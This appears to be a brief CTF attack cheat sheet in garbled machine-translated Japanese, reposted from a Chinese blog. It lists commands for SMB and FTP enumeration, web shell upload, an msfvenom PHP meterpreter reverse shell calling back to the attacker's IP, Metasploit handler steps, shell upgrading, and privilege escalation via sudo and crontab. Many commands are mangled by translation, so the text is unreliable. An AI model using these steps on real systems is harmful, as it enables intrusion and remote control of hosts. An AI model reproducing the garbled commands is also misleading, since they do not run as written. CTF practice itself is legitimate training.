CTFホワイト

SMB情報開示
まず、nmapの-sV IP nmapの-A -v -T4 IP
オープンサービスをスキャンし、すべての詳細情報

SMBプロトコルの場合、空のパスワードのログイン試行を使用して、機密情報を表示するためにダウンロードし
たIPアドレスの下にSMBファイル共有を表示するsmbclientの-L IPを
smbclientの「\\ IP \ファイル」フォルダへのリモートアクセスは
、ダウンロードファイルを取得

また、バージョンの抜け穴を利用することができます
searchsploitバージョン

以下のためのHTTPプロトコルの脆弱性分析
のWebページを表示するには、ブラウザ
DIRB Niktoのプローブ使用して
着陸ターゲットサービスの背景には、ウェブシェルアップロード
データベース・ユーザーに特に注意を

プロダクションウェブシェル
msfvenom -p PHP / Meterpreter / reverse_tcp lhost =攻撃のIP lportは生-f = 4444> /root/Desktop/shell.php

使用ウェブシェル
msfconsple
>使用/マルチ/投手活用
>設定のペイロードPHP / meterpreter / reverse_tcp
>ショーオプション
> IP lhost設定
]> [ファイル名を指定して実行

404アップロードアップロード時点のシェルで
ウェブページ上のアクセス

シェルの最適化
のPython -C "のインポートのPty; pty.spawn( '/ binに/ bashの')"

ビューのユーザー
CAT / etc / passwdファイル
suコマンドスイッチのユーザ
にsudo -l
のsudo suが許可を得ます

/ tmpのバッファリングとタイミングタスクディレクトリは/ etc / crontabの設定、タスクの切り替えシェルはバウンスことに注意してください

FTP

1. nmapの走査
-sV -A -v -T4
2-21 FTPポートである
コード使用して、パラメータを変更する、3。searchsploitバージョン検索スクリプト
4. MSFにまたはリモートオーバーフロー使用
msfconsoleを
>検索バージョン番号
>使用が/利用;; ;;;;;;;;;;;;
>ペイロード表示
> SETペイロード
>ショーopintion
> SETの様々なパラメータを
>活用

表示する5.id許可
最適化端末の
パイソン"を輸入PTY; pty.spawn( ' / binに/ bashの')"

6.チェックフラグ

おすすめ

転載: www.cnblogs.com/Breader/p/11469687.html
おすすめ